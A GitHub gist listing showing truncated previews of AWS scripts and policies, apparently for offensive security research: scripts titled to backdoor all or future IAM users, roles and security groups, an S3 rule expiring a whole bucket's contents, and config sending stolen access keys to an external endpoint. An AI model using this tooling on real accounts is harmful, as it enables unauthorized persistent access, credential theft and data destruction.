Daniel Grzelak dagrz
dagrz
/ IAM assume by lambda policy
Created
June 5, 2016 04:22
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Effect": "Allow", | |
| "Principal": { | |
| "Service": "lambda.amazonaws.com" | |
| }, | |
| "Action": "sts:AssumeRole" | |
| } |
dagrz
/ IAM lambda s3 delete policy
Created
June 5, 2016 04:25
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Version": "2012-10-17", | |
| "Statement": [ | |
| { | |
| "Effect": "Allow", | |
| "Action": [ | |
| "logs:CreateLogGroup", | |
| "logs:CreateLogStream", | |
| "logs:PutLogEvents" | |
| ], |
dagrz
/ s3 bucket delete lifecycle configuration
Created
June 5, 2016 10:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| { | |
| "Rules": [ | |
| { | |
| "Status": "Enabled", | |
| "Prefix": "", | |
| "Expiration": { | |
| "Days": 1 | |
| }, | |
| "ID": "Rule for the Entire Bucket" | |
| } |
dagrz
/ Backdoor all roles in AWS account
Last active
December 30, 2019 16:59
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import boto3 | |
| import json | |
| import random | |
| # A list of Role, User, and account ARNs to allow | |
| # assumption from at random. | |
| BACKDOOR_ROLES = [ | |
| 'your-arn-here' |
dagrz
/ AWS cli proxy Lambda function
Last active
June 18, 2016 00:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import awscli | |
| import awscli.clidriver | |
| from cStringIO import StringIO | |
| import sys | |
| import json | |
dagrz
/ Backdoor all users in AWS account
Last active
August 17, 2016 01:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import boto3 | |
| from botocore.exceptions import ClientError | |
| import json | |
| def main(args): | |
| backdoor_users(get_users()) |
dagrz
/ Backdoor all security groups in AWS account
Last active
September 16, 2018 04:39
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import boto3 | |
| from botocore.exceptions import ClientError | |
| import json | |
| import random | |
| # A list of rules to add at random to security groups. | |
| BACKDOOR_RULES = [ |
dagrz
/ AWS Lambda user rabbit
Created
June 26, 2016 09:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import json | |
| import boto3 | |
| import random | |
| import re | |
| import string | |
| def lambda_handler(event, context): |
dagrz
/ Backdoor future users in AWS account
Created
July 7, 2016 13:43
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import json | |
| import boto3 | |
| from botocore.exceptions import ClientError | |
| import requests | |
| # An endpoint to send access keys to, e.g. http://requestb.in/ | |
| POST_URL = 'https://...' |
dagrz
/ Backdoor future roles in AWS account
Created
July 9, 2016 01:17
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| from __future__ import print_function | |
| import json | |
| import boto3 | |
| from botocore.exceptions import ClientError | |
| import requests | |
| import random | |
| # An endpoint to send access keys to, e.g. http://requestb.in/ | |
| POST_URL = 'https://...' |